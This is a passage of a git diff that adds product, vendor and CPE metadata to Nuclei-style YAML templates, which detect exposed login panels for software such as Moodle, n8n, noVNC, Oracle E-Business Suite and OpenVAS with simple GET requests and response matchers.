'contains_any(body, "content=\"Monitorr", "Monitorr is loading", "title=\"Monitorr Settings")' condition: and -# digest: 4a0a0047304502210096e5fe7b74f97663c17f793bb7618f9cf72bbdfadc19a29c0a67629c7263a2ea02207c1e354330ad62a80cc115055fbac9b0f8807ee24740ed3fa82acbdefa0dad84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210096e5fe7b74f97663c17f793bb7618f9cf72bbdfadc19a29c0a67629c7263a2ea02207c1e354330ad62a80cc115055fbac9b0f8807ee24740ed3fa82acbdefa0dad84:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/moodle-workplace-panel.yaml b/http/exposed-panels/moodle-workplace-panel.yaml index efc5906758..39a8a1c0b2 100644 --- a/http/exposed-panels/moodle-workplace-panel.yaml +++ b/http/exposed-panels/moodle-workplace-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 1 shodan-query: http.html:"moodle" + product: moodle + vendor: moodle tags: panel,moodle,login,detect + classification: + cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* http: - method: GET path: @@ -25,4 +29,4 @@ http: - 'status_code == 200' - 'contains_any(body, "content=\"moodle", "\"name\":\"moodle\"") && contains(body, "workplace")' condition: and -# digest: 4b0a00483046022100c975213bd6444fe2e0b59d65b699c5ed2a41a14acee0900fa844926960f3004e022100894f4ecff202d0d03c259b3615ba576ab2c5235292abfd19feb23fb13d0b7b9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c975213bd6444fe2e0b59d65b699c5ed2a41a14acee0900fa844926960f3004e022100894f4ecff202d0d03c259b3615ba576ab2c5235292abfd19feb23fb13d0b7b9f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/mylittleadmin-panel.yaml b/http/exposed-panels/mylittleadmin-panel.yaml index 02c438da79..e25a66ff27 100644 --- a/http/exposed-panels/mylittleadmin-panel.yaml +++ b/http/exposed-panels/mylittleadmin-panel.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:mylittletools:mylittleadmin:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.html:"myLittleAdmin" + product: mylittleadmin + vendor: mylittletools tags: panel,mylittleadmin,login http: @@ -32,4 +35,4 @@ http: - "status_code == 200" - "contains(body, 'myLittleAdmin for SQL Server')" condition: and -# digest: 490a0046304402202d7eac42265bfab61a6a2e5dd7579618b1401adfd5a49f12b9426d70151ddea50220239290835151a2f3417710840fcb62aaff6d040eef82f36b002c4076e3a1d4f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202d7eac42265bfab61a6a2e5dd7579618b1401adfd5a49f12b9426d70151ddea50220239290835151a2f3417710840fcb62aaff6d040eef82f36b002c4076e3a1d4f0:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/mylittlebackup-panel.yaml b/http/exposed-panels/mylittlebackup-panel.yaml index 801d94a236..2aa5078e62 100644 --- a/http/exposed-panels/mylittlebackup-panel.yaml +++ b/http/exposed-panels/mylittlebackup-panel.yaml @@ -11,10 +11,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:mylittletools:mylittlebackup:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 shodan-query: http.html:"myLittleBackup" + product: mylittlebackup + vendor: mylittletools tags: panel,mylittlebackup http: @@ -40,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205dd020ae0315841fdef511dbe0256de97fd535994d4c9df005be722b34fe6fc9022100b1f67498ca1e25a897d26eaf69adf610eda3c4785b3234155e1a697028030dee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205dd020ae0315841fdef511dbe0256de97fd535994d4c9df005be722b34fe6fc9022100b1f67498ca1e25a897d26eaf69adf610eda3c4785b3234155e1a697028030dee:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/n8n-panel.yaml b/http/exposed-panels/n8n-panel.yaml index 86bcee5db6..fdcb667598 100644 --- a/http/exposed-panels/n8n-panel.yaml +++ b/http/exposed-panels/n8n-panel.yaml @@ -1,5 +1,5 @@ -id: n8n-panel - +id: n8n-panel + info: name: n8n Panel - Detect author: userdehghani @@ -12,22 +12,26 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-831756631 + product: n8n + vendor: n8n tags: panel,n8n,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/signin" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<title>n8n.io' - case-insensitive: true - - - type: status - status: + classification: + cpe: cpe:2.3:a:n8n:n8n:*:*:*:*:node.js:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/signin" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>n8n.io' + case-insensitive: true + + - type: status + status: - 200 -# digest: 4b0a004830460221009cad1769a5b822269a5ac8dfdcbd4ead3932de47114219e72aaf5ce500d9516402210081a1c778151e62aa75f7ee379714349dda4db40844e59b92932d95cd8d6771f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009cad1769a5b822269a5ac8dfdcbd4ead3932de47114219e72aaf5ce500d9516402210081a1c778151e62aa75f7ee379714349dda4db40844e59b92932d95cd8d6771f3:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ncentral-panel.yaml b/http/exposed-panels/ncentral-panel.yaml index 773a253d74..3fff9bd763 100644 --- a/http/exposed-panels/ncentral-panel.yaml +++ b/http/exposed-panels/ncentral-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:n-able:n-central:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"N-central Login" + product: n-central + vendor: n-able tags: panel,n-central http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e8e6c1b279ca933d948f8090b1871b50313a78c08e61c53c384b3b801477692402210084eb060a868735f69c44dbabac0285f267e8083b861503e9a1059c72eb2410fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e8e6c1b279ca933d948f8090b1871b50313a78c08e61c53c384b3b801477692402210084eb060a868735f69c44dbabac0285f267e8083b861503e9a1059c72eb2410fc:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/nconf-panel.yaml b/http/exposed-panels/nconf-panel.yaml index 5b5cef0061..43f00b14e5 100644 --- a/http/exposed-panels/nconf-panel.yaml +++ b/http/exposed-panels/nconf-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:nconf_project:nconf:*:*:*:*:node.js:*:*:* metadata: verified: true max-request: 1 shodan-query: http.title:"nconf" + product: nconf + vendor: nconf_project tags: panel,nconf http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205d8aa1ec4cc339024ead3d07cd8be0b7342b160f1e4598dc046600d64df028fd022053ed39c0443bb78cb4e3b119128e27e57f4885886a8b7af87e78682013bb47e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205d8aa1ec4cc339024ead3d07cd8be0b7342b160f1e4598dc046600d64df028fd022053ed39c0443bb78cb4e3b119128e27e57f4885886a8b7af87e78682013bb47e8:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/netflow-analyzer-panel.yaml b/http/exposed-panels/netflow-analyzer-panel.yaml index eb931f3cfe..4939419828 100644 --- a/http/exposed-panels/netflow-analyzer-panel.yaml +++ b/http/exposed-panels/netflow-analyzer-panel.yaml @@ -8,8 +8,12 @@ info: shodan-query: html:"Login - Netflow Analyzer" verified: true max-request: 1 + product: manageengine_netflow_analyzer + vendor: zohocorp tags: netflow,analyzer,panel,login + classification: + cpe: cpe:2.3:a:zohocorp:manageengine_netflow_analyzer:*:*:*:*:*:*:*:* http: - raw: - | @@ -26,4 +30,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d88f87529eb06a2012cd5e6d7f13e08f3e4863a538853b272ffc358fedbc2e9e022100d6e46704bbe4098aba415834c8e422c176af1a3dbe82a4d43c8b5d511abb3a20:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/nginx-proxy-manager.yaml b/http/exposed-panels/nginx-proxy-manager.yaml index b7d1395826..1c48a666c0 100644 --- a/http/exposed-panels/nginx-proxy-manager.yaml +++ b/http/exposed-panels/nginx-proxy-manager.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:nginxproxymanager:nginx_proxy_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Nginx Proxy Manager" + product: nginx_proxy_manager + vendor: nginxproxymanager tags: panel,nginx,proxy http: @@ -34,4 +37,4 @@ http: group: 1 regex: - '"page" id="login" data\-version="([0-9.]+)">' -# digest: 4b0a00483046022100cc86de7bb786dca42a0fffbe19a350ef3a8f54a8747380783b88699ad19a5556022100a46d3838089f55b731df8f96c03256bf15269122b5ab6cbe8b72b964753deb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cc86de7bb786dca42a0fffbe19a350ef3a8f54a8747380783b88699ad19a5556022100a46d3838089f55b731df8f96c03256bf15269122b5ab6cbe8b72b964753deb21:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/nocodb-panel.yaml b/http/exposed-panels/nocodb-panel.yaml index 0252ab8ffc..07d08c657f 100644 --- a/http/exposed-panels/nocodb-panel.yaml +++ b/http/exposed-panels/nocodb-panel.yaml @@ -1,5 +1,5 @@ -id: nocodb-panel - +id: nocodb-panel + info: name: NocoDB Panel - Detect author: userdehghani @@ -13,24 +13,28 @@ info: verified: true max-request: 2 shodan-query: "http.favicon.hash:206985584" + product: nocodb + vendor: xgenecloud tags: panel,nocodb,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/dashboard/#/signin" - - "{{BaseURL}}/dashboard/favicon.ico" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: word - part: body - words: - - 'content="NocoDB' - case-insensitive: true - - - type: dsl - dsl: + classification: + cpe: cpe:2.3:a:xgenecloud:nocodb:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/dashboard/#/signin" + - "{{BaseURL}}/dashboard/favicon.ico" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: word + part: body + words: + - 'content="NocoDB' + case-insensitive: true + + - type: dsl + dsl: - "status_code==200 && (\"206985584\" == mmh3(base64_py(body)))" -# digest: 490a00463044022059727c364fc039e006b06bcb90e03466b1396360220a8a5bb0f11d53a5009b35022002ddfb487c4289edae9a37ced37b7a0094ef5689aa2b6ac30964ff0f40936df7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022059727c364fc039e006b06bcb90e03466b1396360220a8a5bb0f11d53a5009b35022002ddfb487c4289edae9a37ced37b7a0094ef5689aa2b6ac30964ff0f40936df7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/novnc-login-panel.yaml b/http/exposed-panels/novnc-login-panel.yaml index 31fa8031fe..93ad2aa07d 100644 --- a/http/exposed-panels/novnc-login-panel.yaml +++ b/http/exposed-panels/novnc-login-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:novnc:novnc:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: http.title:"noVNC" + product: novnc + vendor: novnc tags: panel,novnc http: @@ -34,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210094ac92da221628f8b920d231525479dcab1eac8f280b9f1678a4778810e04eaa0221009d4e9ed665ff3d946592d9f42c4266335407dc9674ae9a96b6259ccf1ddc9937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094ac92da221628f8b920d231525479dcab1eac8f280b9f1678a4778810e04eaa0221009d4e9ed665ff3d946592d9f42c4266335407dc9674ae9a96b6259ccf1ddc9937:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/nport-web-console.yaml b/http/exposed-panels/nport-web-console.yaml index 130abd28e8..a336b97982 100644 --- a/http/exposed-panels/nport-web-console.yaml +++ b/http/exposed-panels/nport-web-console.yaml @@ -10,10 +10,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:moxa:nport_6450-t_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"NPort Web Console" + product: nport_6450-t_firmware + vendor: moxa tags: panel,nport http: @@ -31,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d3a599b6eb103a6372b5de70fbd742247f07aa82ae5b45ac1427f66316b40ce9022100ee90c82cdab73b7258721991d7b5b9012384f25c6b2c1bd1af9097585acb05f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d3a599b6eb103a6372b5de70fbd742247f07aa82ae5b45ac1427f66316b40ce9022100ee90c82cdab73b7258721991d7b5b9012384f25c6b2c1bd1af9097585acb05f2:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/nuxeo-platform-panel.yaml b/http/exposed-panels/nuxeo-platform-panel.yaml index 156d92b315..cc07134647 100644 --- a/http/exposed-panels/nuxeo-platform-panel.yaml +++ b/http/exposed-panels/nuxeo-platform-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:nuxeo:nuxeo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Nuxeo Platform" + product: nuxeo + vendor: nuxeo tags: panel,nuxeo http: @@ -30,4 +33,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220279bee2f484bedd3935b2f3c604bcd7ea36720baeec1291408a2e23dc0e62f25022100e0a96407a4efa87fc90b48b74e34f43ff9b698af4c6f40dbacf2701e946b34ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220279bee2f484bedd3935b2f3c604bcd7ea36720baeec1291408a2e23dc0e62f25022100e0a96407a4efa87fc90b48b74e34f43ff9b698af4c6f40dbacf2701e946b34ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ocs-inventory-login.yaml b/http/exposed-panels/ocs-inventory-login.yaml index e5dcfa2049..2cacd7d550 100644 --- a/http/exposed-panels/ocs-inventory-login.yaml +++ b/http/exposed-panels/ocs-inventory-login.yaml @@ -8,11 +8,14 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:factorfx:ocs_inventory:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 shodan-query: title:"OCS Inventory" fofa-query: title="OCS Inventory" + product: ocs_inventory + vendor: factorfx tags: ocs-inventory,panel http: @@ -35,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202368b16459f413631a97393becbe2f94a3864e0fef4ce99f28fb32095607b9860220693363768540f01912012f1c94429e6a6e5509fec9280989a3e7e5ba9703ce20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202368b16459f413631a97393becbe2f94a3864e0fef4ce99f28fb32095607b9860220693363768540f01912012f1c94429e6a6e5509fec9280989a3e7e5ba9703ce20:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/ollama-llm-panel.yaml b/http/exposed-panels/ollama-llm-panel.yaml index 4545e688c1..714038ce6a 100644 --- a/http/exposed-panels/ollama-llm-panel.yaml +++ b/http/exposed-panels/ollama-llm-panel.yaml @@ -9,10 +9,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:ollama:ollama:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: "Ollama is running" zoomeye-query: app:"Ollama LLM" + product: ollama + vendor: ollama tags: panel,ollama,llm,detect http: @@ -29,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205a3966b2f1295470a45b147c2167434bbc4224ceaa7f65e9147a9fc26c2da047022100acf08ba2a673d8f2b4f54775116a2c9e095d2b12473a7a8e4cc1d315fb268012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a3966b2f1295470a45b147c2167434bbc4224ceaa7f65e9147a9fc26c2da047022100acf08ba2a673d8f2b4f54775116a2c9e095d2b12473a7a8e4cc1d315fb268012:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/omniampx-panel.yaml b/http/exposed-panels/omniampx-panel.yaml index b01fb84102..7258d9ebb4 100644 --- a/http/exposed-panels/omniampx-panel.yaml +++ b/http/exposed-panels/omniampx-panel.yaml @@ -8,10 +8,13 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:h:telosalliance:omnia_mpx_node:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: http.html:"Omnia MPX" + product: omnia_mpx_node + vendor: telosalliance tags: panel,omnia,omniampx http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e53353c7e1702ad8d974e1dda363a30755dcbebbdfb3d6b57d3141e4217565a602205bbeb898131132ef72b926719459ab69af1fc459002f4878f3675e8b7d2d4094:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e53353c7e1702ad8d974e1dda363a30755dcbebbdfb3d6b57d3141e4217565a602205bbeb898131132ef72b926719459ab69af1fc459002f4878f3675e8b7d2d4094:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/openedge-panel.yaml b/http/exposed-panels/openedge-panel.yaml index 380a042cbb..c97d8d51bf 100644 --- a/http/exposed-panels/openedge-panel.yaml +++ b/http/exposed-panels/openedge-panel.yaml @@ -1,30 +1,34 @@ -id: openedge-panel - -info: - name: OpenEdge Login Panel - Detect - author: rxerium - severity: info - description: | - An OpenEdge login panel was detected. - metadata: - shodan-query: html:"Welcome to Progress Application Server for OpenEdge" - verified: true - max-request: 1 - tags: panel,openedge,login,detect - -http: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Welcome to Progress Application Server for OpenEdge" - - - type: status - status: +id: openedge-panel + +info: + name: OpenEdge Login Panel - Detect + author: rxerium + severity: info + description: | + An OpenEdge login panel was detected. + metadata: + shodan-query: html:"Welcome to Progress Application Server for OpenEdge" + verified: true + max-request: 1 + product: openedge + vendor: progress + tags: panel,openedge,login,detect + + classification: + cpe: cpe:2.3:a:progress:openedge:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Welcome to Progress Application Server for OpenEdge" + + - type: status + status: - 200 -# digest: 4a0a00473045022100d1045ca0024a3d2b57ca98df6db2680069b9bbe618487857397156b0331d2dcb0220687d22237d900ece4955ac20d2c9f67b9b0d0a831edbcbf28d6503bd4e487727:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d1045ca0024a3d2b57ca98df6db2680069b9bbe618487857397156b0331d2dcb0220687d22237d900ece4955ac20d2c9f67b9b0d0a831edbcbf28d6503bd4e487727:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/opengear-panel.yaml b/http/exposed-panels/opengear-panel.yaml index b67dcb2639..09210b4585 100644 --- a/http/exposed-panels/opengear-panel.yaml +++ b/http/exposed-panels/opengear-panel.yaml @@ -9,11 +9,14 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:opengear:opengear:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 fofa-query: app="opengear-Management-Console" google-query: intitle:"Opengear Management Console" + product: opengear + vendor: opengear tags: panel,opengear http: @@ -33,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207352ac8516e16364cc85a2e1c67c85c4f43b935cd2cd3b06ef816d878090db26022100fc9d330b2ed555588db34f60ad0ab1a8efe474f45773ac7c1aedd607b4c559f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207352ac8516e16364cc85a2e1c67c85c4f43b935cd2cd3b06ef816d878090db26022100fc9d330b2ed555588db34f60ad0ab1a8efe474f45773ac7c1aedd607b4c559f7:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/openvas-panel.yaml b/http/exposed-panels/openvas-panel.yaml index 50fc255344..8bdf2c1167 100644 --- a/http/exposed-panels/openvas-panel.yaml +++ b/http/exposed-panels/openvas-panel.yaml @@ -1,5 +1,5 @@ -id: openvas-panel - +id: openvas-panel + info: name: OpenVas Login Panel - Detect author: rxerium @@ -12,24 +12,28 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:1606029165 + product: openvas_manager + vendor: openvas tags: panel,openvas,admin,login -http: - - method: GET - path: - - '{{BaseURL}}' - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<title>Greenbone Security Assistant' - - - type: status - status: + classification: + cpe: cpe:2.3:a:openvas:openvas_manager:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - '{{BaseURL}}' + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '<title>Greenbone Security Assistant' + + - type: status + status: - 200 -# digest: 4a0a00473045022100c89b794d3da387a0b04031eb0b5de602460741e4ba4895474dfb0921df4aa307022049fb34e63c9cf59a957d41b69ecf1452c8ed9293bafc74dbeadbb84cfb707ba6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c89b794d3da387a0b04031eb0b5de602460741e4ba4895474dfb0921df4aa307022049fb34e63c9cf59a957d41b69ecf1452c8ed9293bafc74dbeadbb84cfb707ba6:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/oracle-ebusiness-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml index 7b1664137e..41677af723 100644 --- a/http/exposed-panels/oracle-ebusiness-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -1,5 +1,5 @@ -id: oracle-ebusiness-panel - +id: oracle-ebusiness-panel + info: name: Oracle E-Business Suite Login Panel - Detect author: righettod @@ -12,27 +12,31 @@ info: verified: true max-request: 1 shodan-query: http.html:"Oracle UIX" + product: e-business_suite + vendor: oracle tags: panel,oracle,login,detect -http: - - method: GET - path: - - "{{BaseURL}}/OA_HTML/AppsLogin" - - redirects: true - max-redirects: 2 - - matchers: - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_any(to_lower(body), "/oa_html/oa.jsp", "oracle uix")' - condition: and - - extractors: - - type: regex - part: body - group: 1 - regex: + classification: + cpe: cpe:2.3:a:oracle:e-business_suite:*:*:*:*:*:*:*:* +http: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/AppsLogin" + + redirects: true + max-redirects: 2 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "/oa_html/oa.jsp", "oracle uix")' + condition: and + + extractors: + - type: regex + part: body + group: 1 + regex: - '(?i)/OA_HTML/cabo/oajsLibs/oafcore([A-Z0-9]+).js' -# digest: 4a0a00473045022100c2d6e8e3ce8ee5591c514fe83e3b5e87117757540fd00c7e89f532f3ffc93bd502204d33d1e6f2e9f52a95ada84d8fd2b1fc188c6e3a2b9153b6004d90885e40646f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c2d6e8e3ce8ee5591c514fe83e3b5e87117757540fd00c7e89f532f3ffc93bd502204d33d1e6f2e9f52a95ada84d8fd2b1fc188c6e3a2b9153b6004d90885e40646f:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/oracle-integrated-manager.yaml b/http/exposed-panels/oracle-integrated-manager.yaml index 7beb0ab1f8..dcbe1959c5 100644 --- a/http/exposed-panels/oracle-integrated-manager.yaml +++ b/http/exposed-panels/oracle-integrated-manager.yaml @@ -8,9 +8,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:o:oracle:integrated_lights_out_manager_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"Oracle(R) Integrated Lights Out Manager" + product: integrated_lights_out_manager_firmware + vendor: oracle tags: oracle,login,panel http: @@ -35,4 +38,4 @@ http: group: 1 regex: - 'id="hostname">([a-z0-9-]+)<\/span><\/td>' -# digest: 4a0a00473045022100e72c27c86f9bd20bb27025102e25328ad77057b9063705791020e7261ece296f022049d8d4dd2e0770f9b57c8b39afce6b387320f1b9d807063d2f683f5cca14616d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e72c27c86f9bd20bb27025102e25328ad77057b9063705791020e7261ece296f022049d8d4dd2e0770f9b57c8b39afce6b387320f1b9d807063d2f683f5cca14616d:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/oracle-peoplesoft-panel.yaml b/http/exposed-panels/oracle-peoplesoft-panel.yaml index a1018393de..d6ce22c035 100644 --- a/http/exposed-panels/oracle-peoplesoft-panel.yaml +++ b/http/exposed-panels/oracle-peoplesoft-panel.yaml @@ -10,11 +10,14 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:*:*:*:*:*:*:*:* metadata: verified: true max-request: 12 shodan-query: "http.title:\"Oracle PeopleSoft Sign-in\"" fofa-query: "title=\"Oracle PeopleSoft Sign-in\"" + product: peoplesoft_enterprise_peopletools + vendor: oracle tags: oracle,peoplesoft,panel,login,detect http: @@ -49,4 +52,4 @@ http: group: 1 regex: - '(?i)\*\s+Copyright\s+\(c\)\s+([0-9,\s]+)\s+Oracle\s+and\/or\s+its\s+affiliates.' -# digest: 490a004630440220617a04e0c33b683e725b018c3f43cca51e89363fa87385d261cab73be902830002203075fde8eed33be1fb80b694c5cc0d2abe5dfee80ba231a1b97d84014559d813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220617a04e0c33b683e725b018c3f43cca51e89363fa87385d261cab73be902830002203075fde8eed33be1fb80b694c5cc0d2abe5dfee80ba231a1b97d84014559d813:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/osnexus-panel.yaml b/http/exposed-panels/osnexus-panel.yaml index 968f5b3123..144bfc6d7f 100644 --- a/http/exposed-panels/osnexus-panel.yaml +++ b/http/exposed-panels/osnexus-panel.yaml @@ -9,9 +9,12 @@ info: classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 + cpe: cpe:2.3:a:osnexus:quantastor:*:*:*:*:*:*:*:* metadata: max-request: 1 shodan-query: http.title:"OSNEXUS QuantaStor Manager" + product: quantastor + vendor: osnexus tags: panel,osnexus,login http: @@ -28,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c7e804802dfa5121a84caa4d5ae078dabbe8a86023be45d4b24c0b1382da0e28022100d1a383002896d815f0ac1fd6dc116dbbee9d8f8b273513e748e20d4ec51edb53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7e804802dfa5121a84caa4d5ae078dabbe8a86023be45d4b24c0b1382da0e28022100d1a383002896d815f0ac1fd6dc116dbbee9d8f8b273513e748e20d4ec51edb53:922c64590222798bb761d5b6d8e72950 diff --git a/http/exposed-panels/outsystems-servicecenter-panel.yaml b/http/exposed-panels/outsystems-servicecenter-panel.yaml index 83e6421af0..1006091418 100644 --- a/http/exposed-panels/outsystems-servicecenter-panel.yaml +++ b/http/exposed-panels/outsystems-servicecenter-panel.yaml @@ -12,8 +12,12 @@ info: verified: true max-request: 2 shodan-query: "http.html:\"outsystems\"" + product: platform_server + vendor: outsystems tags: panel,outsystems,login,detect + classification: + cpe: cpe:2.3:a:outsystems:platform_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +40,4 @@ http: group: 1 regex: - 'environmentName:.?([a-z0-9A-Z\s]+).?' -# digest: 